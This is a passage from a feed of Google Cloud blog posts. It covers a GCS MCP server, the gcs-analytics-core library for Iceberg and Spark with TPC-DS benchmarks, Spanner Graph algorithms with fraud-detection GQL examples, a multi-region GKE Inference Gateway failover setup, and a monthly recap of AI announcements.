The GCS Local MCP server is an open-source GitHub repository of Google-maintained tools that provides you with a reliable bridge to your data. Here are a few tips to keep in mind while designing custom tools:

Provide precise, clear descriptions to minimize incorrect invocations by the models
Implement model-friendly error handling for models to understand their mistakes and self-correct

The GCS Local MCP is now also a part of the MCP Toolbox for Databases, a single open-source repository containing connectors for major data services such as GCS, BigQuery, AlloyDB, Spanner, and Cloud SQL, making it easier to monitor and manage your data ecosystem. The Toolbox offers simplified development with reduced boilerplate code, enhanced security through OAuth2 and OIDC, and end-to-end observability with OpenTelemetry integration.

Get started

Whether you are optimizing an existing process like Snap or automating workflow creations like Airwallex, your unstructured data is one of your agent's greatest assets.

Explore the generally available GCS Remote MCP Server.
Check out our GCS Local MCP GitHub repository to start building custom tools today, or use it as part of MCP Toolbox for Databases.
Reach out to us to discuss your Agent use case with GCS data.

Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core

Tue, 02 Jun 2026 16:00:00 +0000

Many data engineers spend significant time managing compatibility and getting best performance across multiple analytics engines. To help solve this pain point, we are excited to announce gcs-analytics-core, a new open-source Java library designed to centralize and accelerate analytics optimizations for Google Cloud Storage (GCS).

With this, you get the flexibility to select your preferred analytics engine while achieving high performance on GCS. The gcs-analytics-core library provides optimizations across various analytics engines that you use today on GCS, like the Iceberg Spark engine and plan to expand to other analytics engines by the end of this year.

Built to be shared across major data processing frameworks like Apache Spark, this library consolidates and improves performance for analytics workloads on GCS. Available natively in the Apache Iceberg Java runtime starting from version 1.11.0, this library improves read operations for columnar formats like Parquet.

What is the gcs-analytics-core library?

The gcs-analytics-core library is a centralized optimization layer that sits between your analytics engines — such as Apache Spark, Trino, and Apache Hive — and the underlying GCS Java SDK. It intercepts read calls and injects performance enhancements, providing a consistent experience without requiring framework-specific tuning.

For Apache Iceberg users, it integrates into the GCSFileIO implementation, replacing traditional sequential reads with parallelized strategies to minimize latency and maximize throughput.

Key technical optimizations

The library introduces specific optimizations designed to reduce time spent on I/O and end-to-end execution time:

Vectored I/O (threaded): This feature improves read performance by fetching multiple data ranges in parallel within a single operation, reducing the overhead of GCS calls. Without this feature, the system needs to issue a separate call for each data range, increasing both the number of operations and open file latency for each request.
Smart Parquet prefetching: When reading Parquet data, analytics engines typically perform an initial read of the file’s footer, which contains the data structure and information about where specific data ranges are located. The library automatically prefetches this footer data in a single chunk (typically 50KB–100KB), avoiding the multiple network calls that often occur when engines repeatedly seek backward to fetch metadata..

Spotlight: Apache Iceberg integration

We delivered the first major integration of this library into Apache Iceberg. With Iceberg 1.11.0 or later, analytics engines utilizing Iceberg’s GCSFileIO can leverage these performance enhancements. To adopt the library in your environment, verify your Iceberg catalog is configured to use the native GCS FileIO:

code_block: <ListValue: [StructValue([('code', '# Spark configuration example\r\nspark.sql.catalog.my_catalog.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79ccc1a60>)])]>

Because the core optimizations are embedded within the updated Iceberg runtime and the GCS connector architecture, you automatically benefit from Parquet footer prefetching and multi-threaded vectored reads — with no complex custom tuning required.

You can follow the specific integration details in Apache Iceberg Issue #14326.

Catalog compatibility

The gcs-analytics-core library is compatible with all Iceberg catalogs including the REST catalog, Hive, and other metadata management systems. By decoupling the performance optimizations from the catalog management layer, the library provides consistent read improvements without requiring adjustments to your existing infrastructure setup so you can scale across diverse data lake architectures.

TPC-DS Performance Benchmarks using Spark

To validate these improvements, end-to-end benchmarking was performed using an open source Apache Spark cluster with an Iceberg catalog configured to use GCSFileIO along with the gcs-analytics-core library.

The benchmark leveraged the industry-standard TPC-DS schema across varying dataset sizes (from 1GB up to 10TB), specifically comparing the new library's optimizations against the default GCSFileIO implementation, which uses sequential vectored reads.

By alleviating the I/O bottleneck at the storage layer, compute engines spend less time waiting for network responses (scan time) and more time processing data (execution time).

Here are the end-to-end TPC-DS benchmark results showcasing the percentage improvement when enabling gcs-analytics-core:

TPC-DS schema size	Scan time improvement	Execution time improvement
1 GB	71.51%	32.61%
10 GB	48.48%	18.94%
100 GB	40.98%	10.95%
1 TB	35.86%	3.38%
10 TB	18.40%	1.58%

As the data shows, there is a consistent improvement across all dataset sizes. The library is effective for the complex query patterns in TPC-DS, delivering scan time reductions that directly lower overall query execution time.

Get started

Before running your Spark workloads, confirm that the following requirements and configurations are met:

Use Apache Iceberg Spark runtime 1.11.0+ and the iceberg-gcp-bundle 1.11.0+.
Configure your catalog to use GCSFileIO.
Enable the gcs-analytics-core optimization flag (spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true).
Enable vectorized I/O (spark.sql.iceberg.vectorization.enabled=true) to achieve read performance.

code_block: <ListValue: [StructValue([('code', 'spark-submit \\\r\n --packages org.apache.iceberg:iceberg-spark-runtime-3.5_2.12:1.11.0,org.apache.iceberg:iceberg-gcp-bundle:1.11.0 \\\r\n --conf spark.sql.catalog.$CATALOG_NAME=org.apache.iceberg.spark.SparkCatalog \\\r\n --conf spark.sql.catalog.$CATALOG_NAME.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO \\\r\n --conf spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true \\\r\n --conf spark.sql.iceberg.vectorization.enabled=true \\\r\n <your-application-jar-or-script>'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79ccc1190>)])]>

The gcs-analytics-core library is open source and available for developers to contribute to the project and explore the source code. Our implementation and micro-benchmark configurations are part of the repository and can be referenced for your contributions or validations.

GitHub repository: GoogleCloudPlatform/gcs-analytics-core
Documentation: Review the design document for deep architectural details.

We want to hear about your experience. If you test this on your own datasets, please feel free to open an issue on GitHub or share your results with the community. We look forward to seeing how you utilize these optimizations in your data lakes.

Announcing Spanner Graph algorithms: Google-grade intelligence for connected data

Tue, 02 Jun 2026 16:00:00 +0000

At Google Cloud Next, we announced the preview of graph algorithms with Spanner Graph, bringing Google Research’s state-of-the-art graph mining capabilities natively to your database. These graph intelligence capabilities can help you derive valuable insights from graph data faster, cheaper, and at scale.

Enterprises are increasingly leveraging graph technologies to uncover complex relationships in data for use cases such as fraud detection, social network analysis, entity resolution, and healthcare research. Graph algorithms, such as node centrality and community detection, are the computational methods used to analyze these structures, and work by quantifying the patterns and strength of connections between entities. However, running graph algorithms at scale has historically been challenging and resource-intensive, often requiring complex ETL pipelines to dedicated analytic solutions or risking the transactional performance of the graph database.

We designed Spanner Graph algorithms to tackle demanding enterprise workloads without compromising on the performance of your operational database. This architecture provides several distinct advantages:

Tight integration with GQL: Directly invoke algorithms using ISO Graph Query Language (GQL) to run structural analytics across your data. By sequentially weaving algorithms and standard queries together, Spanner Graph minimizes complex data movement to external engines, simplifying your architecture and accelerating time-to-insight.
Near-zero transactional impact and lower TCO: Algorithm execution happens on dedicated compute resources, so as not to impact live production traffic. Spanner automatically provisions resources and securely routes data via Data Boost without having to create a custom ETL pipeline. Pay only for what you use, avoiding expensive licensing and operational overhead of legacy solutions.
Global insights on billion-edge graphs in minutes: Built for scale and speed, our engine can run algorithms on graphs with tens of billions of edges within minutes. Encoding topologies in a dense format that’s optimized for random access enables high-performance structural analytics on massive datasets.

While Google Research has published several research papers, held workshops, and released open-source projects based on its graph mining tools (e.g., for multi-core clustering), this is the first time that they are widely available to Google Cloud customers. Let’s take a deeper look at graph algorithms, and how you can use them with Spanner Graph.

Algorithms: Deeper insights for connected data

When we first launched Spanner Graph, our goal was to reimagine graph data management with a native graph database experience within Spanner, Google’s highly scalable, distributed database. Spanner Graph unifies relational and graph models, allowing developers to query connected data using the ISO GQL, while also interoperating with Spanner's existing tabular, search, and vector capabilities. This allows you to build intelligent applications without creating complex data pipelines, duplicating data, or increasing security and governance risk.

Building on this foundation, Spanner Graph algorithms help you to extract even deeper insights from your connected data. Graph algorithms analyze the relationships and connections within data, revealing hidden patterns and insights that might be missed with traditional analytical methods. With this launch, you can analyze connectedness to, for example, detect fraud rings, conduct clustering for entity resolution, identify points of failure in complex networks, or recommend products based on the preferences of connected users.

We use graphs extensively at Google. In fact, many popular algorithms like PageRank, the foundational technology that powers Google Search, were invented here. With native algorithm support in Spanner Graph, we are bringing some of Google’s leading graph intelligence capabilities directly to Google Cloud customers, with a set of essential graph algorithms that help you easily uncover the hidden structures within your data:

Centrality: Pinpoint the most influential and central nodes within your network using betweenness centrality, closeness centrality, and PageRank.
Community detection: Automatically group highly connected entities to uncover hidden segments with label propagation, correlation clustering, modularity clustering, weakly connected components, and clique aggregator.
Similarity and path finding: Find optimal routes using set-to-set shortest paths, or measure node similarities using Jaccard, cosine, common neighbors, and total neighbors.

An integrated developer experience

You can invoke graph algorithms directly using GQL on the entire graph, subgraphs, or a select set of nodes and edges. Spanner offers an integrated workflow: results from graph algorithm runs can be written directly back to Spanner Graph. This lets you invoke algorithms and standard queries sequentially, using the output of one operation as input to the next. Additionally, you can also store results in Cloud Storage buckets.

Example: Uncovering the ringleader of a fraudulent network

Consider a scenario where you are analyzing financial transactions to combat money laundering. Fraudsters usually manipulate a set of “mule” accounts (intermediary accounts for money laundering) that interact with one another to collectively commit fraud. To capture the teamwork between detected and hidden mule accounts, anti-fraud experts usually resort to link analysis and community detection graph algorithms. Here’s how you can use algorithms and queries together in Spanner Graph to catch them.

Step 1: Identify communities of accounts (algorithm)
First, we apply a modularity clustering algorithm to cluster accounts into communities. We then write the resulting community_id directly back to the Account in Spanner Graph.

code_block: <ListValue: [StructValue([('code', "-- Runs community detection and update results to the graph\r\nEXPORT DATA OPTIONS(\r\n format ='CLOUD_SPANNER',\r\n table = 'Account',\r\n write_mode = 'update_ignore_all'\r\n) AS\r\nGRAPH FinGraph\r\nCALL ModularityClustering(\r\n node_labels => ['Account'],\r\n edge_labels => ['Transfer']\r\n)\r\nYIELD node, cluster\r\nRETURN node.id, cluster AS community_id;"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79c973ac0>)])]>

Step 2: Pinpoint the suspicious community (query)
Now that every account belongs to a community, we can use a GQL query to perform analytical queries on each community to uncover anomalous behaviors. For example, we can check the total number of known fraud accounts within each community.

code_block: <ListValue: [StructValue([('code', '-- Finds the community with the highest concentration of flagged fraud\r\nGRAPH FinGraph\r\nMATCH (a:Account)\r\nWHERE a.community_id IS NOT NULL\r\n AND a.fraud_flag = TRUE\r\nRETURN a.community_id AS community_id, COUNT(*) AS fraud_count\r\nORDER BY fraud_count DESC;'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79e345eb0>)])]>

Step 3: Calculate influence to find the "ringleader" (algorithm on a subgraph)
Let's assume the query above reveals that Community 2 has seen a massive spike in fraudulent activity. In this step, we filter the graph to isolate only the accounts in that specific community and run the PageRank algorithm to find the central ringleader within that exact group.

code_block: <ListValue: [StructValue([('code', "EXPORT DATA OPTIONS(\r\n format = 'CLOUD_SPANNER',\r\n table = 'Account',\r\n write_mode = 'update_ignore_all' \r\n) AS\r\n-- Specifies a suspicious subgraph\r\nGRAPH FinGraph\r\nMATCH (n:Account {community_id: 2})\r\nRETURN n\r\nFULL UNION ALL\r\nMATCH -[e:Transfer]->\r\nRETURN e\r\nNEXT\r\n-- Runs PageRank \r\nCALL PER() PageRank(max_iterations => 20) \r\nYIELD node, score\r\nRETURN node.id, score AS pagerank_score;"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79e456f40>)])]>

Step 4: Investigate the target (query)
Now that the accounts in Community 2 have a pagerank_score, we can write a query that isolates the most central account and that immediately traces where that specific ringleader moved their funds recently.

code_block: <ListValue: [StructValue([('code', "-- Finds the top scorer (ringleader) and trace their money\r\nGRAPH FinGraph\r\nMATCH (ringleader:Account {community_id: 2})\r\nORDER BY ringleader.pagerank_score DESC\r\nLIMIT 1\r\nWITH ringleader\r\nMATCH (ringleader)-[e:Transfer]->{1, 5}(receiver:Account)\r\nWHERE e.ts > '2025-12-01'\r\nRETURN ringleader.id AS ringleader_id, receiver.id AS receiver_id, e.amount, e.ts;"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79e456eb0>)])]>

By allowing you to weave high-performance algorithms with standard GQL queries, Spanner Graph eliminates the need to move data back and forth between operational databases and external analytics engines. This unified approach dramatically simplifies your data architecture and accelerates your time to insight.

Trusted by industry leaders

Customers like DaVita, Yahoo!, SoundCloud, and WPP are already leveraging Spanner Graph algorithms to solve some of their most complex data challenges.

"Leveraging Spanner Graph for our Patient 360 initiative has allowed us to consolidate complex healthcare data into a single, unified view. The addition of native graph algorithms like community detection and centrality is a major step forward, enabling us to uncover deep insights within our patient networks faster and at scale. These fully managed capabilities allow our team to focus on driving innovation in patient care without the operational burden of managing complex data pipelines." - Sam Ghosh, Chief Enterprise Architect at DaVita Kidney Care

"Operating at global scale across Yahoo’s iconic consumer properties requires us to unify billions of user profiles into a single, real-time view. With Spanner Graph, we’ve modeled our Unified User Profile (UUP) as a graph, bringing together previously distributed systems into a centralized source of truth. The addition of fully managed graph algorithms on Spanner further accelerates our ability to deliver personalization at scale. By leveraging algorithms such as community detection and PageRank, we can drive deeper audience segmentation and power more relevant, engaging user experiences across our platform." - Chris James, Director of Engineering, Yahoo

"With 500+ million tracks from 40+ million artists across 190+ countries, SoundCloud is where emerging artists find their sound, hidden gems are discovered, and music culture is shaped in real time. We have been running graph algorithms in batch mode for years, with processes often taking multiple hours on custom clusters to analyze our massive, multi-billion-edge music graph. The launch of Spanner Graph algorithms is a true game-changer: It not only provides the massive scalability we need, but also allows us to move away from complex custom Python workflows to a fully managed service. Most importantly, it unlocks the ability to run graph algorithms on our most up-to-date data for use cases like identifying creator hubs and improving recommendations, without requiring complex ETL pipelines or impacting the low-latency transactional workloads running on Spanner today." - Sergey Chekanskiy, VP of Engineering - Data Foundation, SoundCloud

“We've been eager to leverage advanced graph algorithms for Open Intelligence, our foundational intelligence layer that securely connects trillions of live data points from clients, partners and WPP in a privacy-first way and that is now integrated and powers WPP’s agentic marketing platform, WPP Open. In order to have instant, exploratory access to complex relationships across billions of entities – driving planning, modelling, and experimentation — we need native support for deep graph traversal, structural pattern recognition, and advanced algorithms. Algorithm support on Spanner Graph provides the performance and scalability to tackle our most challenging graph analytics problems without operational overhead or expensive licensing." - Rob Marshall, Head of Strategy, Data & Intelligence, WPP

Build more intelligent applications

Now with native support for algorithms in Spanner Graph you can move beyond basic relationship traversals and run deep structural analytics directly on your freshest transaction data. By applying these classic graph algorithms at scale, you can unlock new capabilities for your enterprise applications:

Proactive fraud detection and anti-money laundering: Expose coordinated fraud rings by automatically grouping connected mule accounts with Community Detection (like modularity clustering), then apply centrality (like PageRank) to pinpoint the ringleader who controls the illegal fund flow.
Customer 360 and entity resolution: Unify fragmented, cross-channel data into a single canonical profile using similarity functions like Jaccard and community detection like label propagation. These profiles can be further enriched for downstream ML training by generating topological features, such as PageRank, for each node.
Autonomous network operations and digital twins: Model your IT or telecom infrastructure as a digital twin, using similarity and path finding (like set-to-set shortest path) to proactively identify critical vulnerabilities and predict cascading failures.
Hyper-personalized product recommendations: Move beyond basic purchase histories by analyzing broader user behaviors. Use similarity algorithms (like common neighbors) to find overlapping preferences between entities, and centrality (like personalized PageRank) to surface the most relevant recommendations for those peer groups.
Resilient supply chain and logistics: Protect your supply chain from hidden bottlenecks using centrality (like betweenness centrality) to pinpoint over-relied-upon distribution hubs, and path finding to instantly calculate efficient alternative routes during disruptions.
Cybersecurity threat hunting and blast-radius analysis: Accelerate threat hunting by applying community detection (like correlation clustering) to isolate anomalous machine communications, and path finding to trace the attacker's exact lateral movement and blast radius.
Predictive customer churn analysis: Stop contagious customer churn by mapping out tight-knit subscriber groups with community detection, then apply centrality to identify and target core influencers with retention promotions before the churn spreads.

Get started today

Spanner Graph algorithms are supported with the Enterprise and Enterprise+ editions of Spanner. To learn more, view the documentation or try out this codelab. You can also watch this video for a summary of graph algorithm support with Spanner Graph.

Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway

Tue, 02 Jun 2026 07:00:00 +0000

What happens when your workload fails in one region but you need access to service? This is a common case for availability and uptime. With recent enhancement to the Kubernetes ecosystem and capabilities like Dynamic Resource Allocation (DRA) and Inference Gateway. I decided to experiment with these capabilities in Google Cloud for a simple test using an AI inference workload.

In this blog, we will explore this setup and you can also jump straight into the detailed configs in this codelab Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET.

Building blocks

To build out this experiment, use the following products, features, and tools:

Google Kubernetes Engine (GKE) managed DRANET: This is a managed feature that lets you request and share resources among Pods. This supports GPUs, and TPUs. In this test TPUs were used in two different regions with networking assigned using managed DRANET.
Multi-cluster GKE Inference gateway: Load balances your AI/ML inference workloads across multiple GKE clusters. This works in a failover situation which is what my experiment intended to test. The type which supports this is the Multi-cluster Cross-region internal Application Load Balancer gke-l7-cross-regional-internal-managed-mc
Cloud Storage FUSE: Provides a way to store data, models, checkpoints, and logs directly in Cloud Storage. To speed up the deployment, an open source gemma model was downloaded to this storage for retrieval.
Virtual private Cloud (VPC): The foundational global network providing isolated, secure communication for the internal load balancers and compute nodes
GKE Fleets: Fleets group the separate regional clusters under a unified management control plane
TPU v6e: Google's custom AI accelerators that provide the high-performance compute required to serve the model. The VM family type used was the ct6e-standard-4t in a 2x2 Slice

Design pattern example

The aim is to deploy a LLM model (Gemma 3) onto 2 GKE clusters in different regions. Each cluster will use 4 TPU v6e chips. The model should be stored in Cloud Storage. The workload is served using GKE Inference Gateway which supports multi-clusters. The traffic should be routed to the region closest to the user and failover to the other region if one region fails.

Putting it together

To get access to the TPUs for your project in two regions you have to ensure you have the necessary quota in those regions.

Begin: Set up the environment.

Create a standard VPC, with firewall rules and subnet in the same zone as the reservation.
Create a proxy-only subnet this will be used with the Internal regional application load balancer attached to the GKE inference gateway
Set up firewall rules allowing traffic and health checks.
Reserve static internal IP addresses in both regions for the Gateway.
Provision a Cloud Storage FUSE bucket and configure a dedicated IAM Service Account. Bind this to a Kubernetes Workload Identity so your pods can securely mount the bucket and read the model weights directly.

Next: Create standard GKE clusters and node pools.

Deploy two separate GKE clusters in your chosen regions configured.
Enable the Gateway API (--gateway-api=standard) and the Cloud Storage FUSE CSI driver (--addons GcsFuseCsiDriver) during cluster creation.
Create dedicated TPU v6e node pools (ct6e-standard-4t) for both clusters.
Enable managed DRANET on these TPU node pools by setting the flags ---accelerator-network-profile=auto, and --node-labels=cloud.google.com/gke-networking-dra-driver=true

Next: Establish the global mesh via Fleet Registration.

Register both GKE clusters to a unified GKE Fleet by following the fleet creation and registration setup.
Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.
Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.

Next: Deploy the AI workload.

Use a temporary Kubernetes job to download the Gemma 3 (gemma-3-27b-it) model weights directly into your Cloud Storage bucket.
Define a ResourceClaimTemplate that explicitly requests the managed DRANET device class (deviceClassName: netdev.google.com ) with the allocation mode set to "All".

code_block: <ListValue: [StructValue([('code', 'apiVersion: resource.k8s.io/v1\r\nkind: ResourceClaimTemplate\r\nmetadata:\r\n name: all-netdev\r\n namespace: default\r\nspec:\r\n spec:\r\n devices:\r\n requests:\r\n - name: req-netdev\r\n exactly:\r\n deviceClassName: netdev.google.com\r\n allocationMode: All'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79db65d30>)])]>

Deploy your inference server (e.g. vLLM) on the TPU nodes in both regions. Ensure the pod spec utilizes node selectors for the 2x2 TPU topology, requests exactly 4 TPUs, and mounts the netdev claim. This guarantees your pods utilize the dedicated accelerator networking alongside standard Ethernet.

Next: Configure the Multi-Cluster Inference Gateway.

Install the necessary Custom Resource Definitions (CRDs) so Kubernetes can process specialized routing objects like the InferenceObjective.
Deploy an AutoscalingMetric to track hardware utilization, such as KV cache usage.
Use Helm to group the independent AI deployments from both regions into a single, logical InferencePool.
Deploy the Cross-Region Gateway and its associated HTTPRoute to manage incoming global traffic.
Apply health checks and backend policies to the pool to ensure load balancing relies on your custom hardware metrics.

Configure an InferenceObjective to instruct the gateway to route prompts to the region with the highest availability, avoiding overloaded TPUs.

code_block: <ListValue: [StructValue([('code', 'apiVersion: gateway.networking.k8s.io/v1\r\nkind: Gateway\r\nmetadata:\r\n name: cross-region-gateway\r\n namespace: default\r\nspec:\r\n gatewayClassName: gke-l7-cross-regional-internal-managed-mc\r\n addresses:\r\n - type: networking.gke.io/named-address-with-region\r\n value: "regions/europe-west4/addresses/gemma-gateway-ip-europe-west4"\r\n - type: networking.gke.io/named-address-with-region\r\n value: "regions/us-east5/addresses/gemma-gateway-ip-us-east5"\r\n listeners:\r\n - name: http\r\n protocol: HTTP\r\n port: 80\r\n---\r\napiVersion: gateway.networking.k8s.io/v1\r\nkind: HTTPRoute\r\nmetadata:\r\n name: gemma-route\r\n namespace: default\r\nspec:\r\n parentRefs:\r\n - name: cross-region-gateway\r\n kind: Gateway\r\n rules:\r\n - backendRefs:\r\n - group: networking.gke.io\r\n kind: GCPInferencePoolImport\r\n name: gemma-pool\r\n port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: HealthCheckPolicy\r\nmetadata:\r\n name: gemma-health-check\r\n namespace: default\r\nspec:\r\n targetRef:\r\n group: networking.gke.io\r\n kind: GCPInferencePoolImport\r\n name: gemma-pool\r\n default:\r\n config:\r\n type: HTTP\r\n httpHealthCheck:\r\n requestPath: /health\r\n port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: GCPBackendPolicy\r\nmetadata:\r\n name: gemma-backend-policy\r\n namespace: default\r\nspec:\r\n targetRef:\r\n group: networking.gke.io\r\n kind: GCPInferencePoolImport\r\n name: gemma-pool\r\n default:\r\n timeoutSec: 100\r\n balancingMode: CUSTOM_METRICS\r\n trafficDuration: LONG\r\n customMetrics:\r\n - name: gke.named_metrics.tpu-cache\r\n dryRun: false\r\n maxUtilizationPercent: 60\r\n---\r\napiVersion: autoscaling.gke.io/v1beta1\r\nkind: AutoscalingMetric\r\nmetadata:\r\n name: tpu-cache\r\n namespace: default\r\nspec:\r\n selector:\r\n matchLabels:\r\n app: gemma-server\r\n endpoints:\r\n - port: 8000\r\n path: /metrics\r\n metrics:\r\n - name: vllm:kv_cache_usage_perc\r\n exportName: tpu-cache\r\n---\r\napiVersion: inference.networking.x-k8s.io/v1alpha2\r\nkind: InferenceObjective\r\nmetadata:\r\n name: gemma-objective\r\n namespace: default\r\nspec:\r\n priority: 10\r\n poolRef:\r\n name: gemma-pool\r\n group: "inference.networking.k8s.io"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb79db65040>)])]>

Testing the Failover

Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.

Next Steps

Take a deeper dive into a hands-on codelab and more information on these features review the following.

Hands-on Codelab: Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET
Document set: DRANET
Documentation: AI Hypercomputer

Want to ask a question, find out more or share a thought? Please connect with me on Linkedin.

What Google Cloud announced in AI this month

Mon, 01 Jun 2026 16:00:00 +0000

Editor’s note: Want to keep up with the latest from Google Cloud? Check back here for a monthly recap of our latest updates, announcements, resources, events, learning opportunities, and more.

We’ve had a busy month! Between announcing Gemini Spark and Gemini 3.5 at Google I/O – and unveiling Google AI Threat Defense, our latest AI-powered cybersecurity solution, we had a lot to share with Google Cloud customers. Keeping up with the latest news takes time, so we gathered the most important announcements, thought leadership, and technical guides in one place to help you quickly catch up.

To learn more about our I/O announcements, here’s everything you need to know for Google Cloud customers, and top news for startups.

Top announcements

Introducing Google AI Threat Defense to help you outpace the adversary: Google Cloud is introducing a comprehensive AI-powered cybersecurity solution — Google AI Threat Defense — an always-on autonomous security platform. Learn more here.

Gemini 3.5: Our latest family of models combines frontier intelligence with action – starting with Gemini 3.5 Flash.
Gemini Omni: Our new model is a leap forward in world understanding, multimodality, and editing, letting you generate any output from any input, starting with video.
Google Antigravity: Google Antigravity’s expanded capabilities and new integration with Agent Platform bring agentic development to your entire organization.
Gemini Spark: For Gemini Enterprise and Workspace customers, Gemini Spark is your 24/7 personal AI agent that helps you work more efficiently by autonomously taking action on your behalf, under your direction.
Google Workspace: Google Pics, our new image generation and editing tool, and new voice features in Gmail, Docs and Keep, help reimagine how you work.
Managed Agents API on Agent Platform: Allows developers to build and run custom agents inside secure, Google-hosted environments that seamlessly integrate with Agent Platform.
CodeMender: A powerful AI security agent provided through Agent Platform, CodeMender can help find and fix vulnerabilities in your code.

Nano Banana 2 and Nano Banana Pro are generally available: Available today via Gemini Enterprise Agent Platform, organizations are already putting the models to work. Learn more here.

Thought leadership (editor’s pick):

Cloud CISO Perspectives: How Google + Wiz changes multicloud strategy for CISOs: Vinod D’Souza, director, Office of the CISO, shares highlights from his RSA Conference fireside chat with Anthony Belfiore, chief strategy officer, Wiz. While threat actors have seen gains from the adversarial misuse of AI, Google and Wiz are tackling these challenges head-on by combining Wiz's deep cloud telemetry with Google's world-class AI and quantum research to help CISOs and their organizations meet the needs of the agentic enterprise era. Read more here.

News you can use:

What Google I/O '26 means for developing agents on Google Cloud: Dig deep into how Gemini Enterprise Agent Platform and the new developer tools shared at I/O fit together, unpack the spectrum of choice for building, and share what we’d actually try first. Learn more here.

Five must-have guides to move agents into production with Gemini Enterprise Agent Platform: Here is a look back at our five-part series covering the architecture patterns and best practices you need to move your agents into production. Learn more here.
How to build an AI-ready security program for the public sector: From industrial control systems to decades-old municipal databases, here’s our CISO guidance to prep AI-ready security programs for the public sector. Learn more here.

Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, Cool stuff customers built.

aside_block: <ListValue: [StructValue([('title', '$300 in free credit to try Google Cloud AI and ML'), ('body', <wagtail.rich_text.RichText object at 0x7fb79e12ed00>), ('btn_text', 'Start building for free'), ('href', 'http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/'), ('image', None)])]>

April

We hosted Google Cloud Next in Las Vegas on April 22, announcing incredible innovations from Gemini Enterprise Agent Platform to our eight-generation TPUs. We also expanded the Gemini Enterprise app in collaborative ways – now, with new features like Projects, you can work side-by-side with your agents and colleagues.

If you missed the livestream, take a look at our Day 1 recap. It’s been incredible to see how customers have been applying AI in thousands of ways — so far, we’ve counted more than 1,300 examples.

Top announcements

1. Gemini Enterprise Agent Platform: Our new, comprehensive platform to build, scale, govern, and optimize agents. Moving forward, all Vertex AI services and roadmap evolutions will be delivered exclusively through the Agent Platform, rather than as a standalone service, to power the next generation of agent development.

The platform is designed around four core pillars — build, scale, govern, and optimize — that allow teams to collaborate seamlessly. Learn more about Agent Platform here.

2. Gemini Enterprise app has all the key components to let teams discover, create, share, and run AI agents in a single environment. At Next ‘26, we introduced several new capabilities in the Gemini Enterprise app:

Agent Designer uses the same no-code agent designer experience of Agent Platform and lets employees build sophisticated schedule- and trigger-based agents using any enterprise connector. It gives you a virtual flowchart of your agent, allowing you to inspect, test, and approve workflows, ensuring total transparency for executing critical business processes.
Long-running agents are designed to execute complex business processes. They can work autonomously in secure cloud sandboxes, giving agents the ability to orchestrate business logic, write code to build custom tools, and complete multi-step work like reconciliation activities or sales prospect sequencing — without needing constant prompting.
Inbox in Gemini Enterprise provides a central location to monitor, guide, and help manage all of your agent activity, including your long-running agents. Notifications are intuitively categorized into actionable groups like "Needs your input," "Errors," and "Completed.”
Projects create a dedicated space where the agent’s memory is confined to the files and conversations your team adds. By connecting it to data sources including Google Drive, NotebookLM, and Google Group Chats, the agent becomes an expert on a specific topic and can provide team members daily briefings or status updates without digging through months of documents.
Skills create simple shortcuts using an “@” mention for repetitive tasks such as applying brand guidelines, formatting a report, and accessing specific data.
Canvas gives our customers an interactive editor directly within Gemini Enterprise. It allows teams to easily create and edit Docs and Slides, and even export to Microsoft 365 files, within the same experience.
Agent Gallery provides access to third-party agents from partners like Adobe, Atlassian, Lovable, and ServiceNow, and is adding more third-party connectors for Asana, Mailchimp, Workday, and more. These integrations enable your agents to retrieve data and execute tasks with your systems-of-record.

3. AI Hypercomputer: Designed specifically for demanding AI workloads, our AI Hypercomputer is an advanced, purpose-built architecture that unites performance-optimized hardware for compute, storage, networking, open software and machine learning frameworks — as well as flexible consumption models — into a single, integrated system. We are announcing innovations at every layer of the AI Hypercomputer:

TPU 8t, optimized for training, uses breakthrough Inter-Chip Interconnect (ICI) technology to scale up to 9,600 TPUs and 2 PB of shared, high-bandwidth memory in a single superpod. It achieves 3x the processing power of Ironwood and delivers up to 2x more performance/Watt.
TPU 8i, optimized for inference, uses our new Boardfly topology to directly connect 1,152 TPUs in a single pod. It features 3x more on-chip SRAM compared to previous versions to host larger KV caches entirely on-silicon and integrates a specialized Collectives Acceleration Engine. Taken together, TPU 8i delivers 80% better performance per dollar for inference than the prior generation, enabling millions of concurrent agents to run cost-effectively.

4. The Agentic Data Cloud: A new data architecture built for the speed and scale of agentic AI. The Agentic Data Cloud delivers an AI-native architecture, allowing agents to perceive, reason, and act on your behalf in real-time, including:

Cross-Cloud Lakehouse, standardized on Apache Iceberg, is our Lakehouse that enables you to leave your data in AWS or Azure (coming later this year) while querying it instantly — without the friction of vendor lock-in or the cost of data movement
Knowledge Catalog constructs a unified, dynamic context graph of your entire business enabling you to ground agents in all of your business data and semantics. With Smart Storage and the Object Context API, files in Google Cloud Storage are instantly tagged and enriched with metadata before an agent touches them. Then our Knowledge Engine uses Gemini to autonomously tag, define logic and instantly map complex relationships across your entire enterprise, providing the semantic definition your agents have been missing.

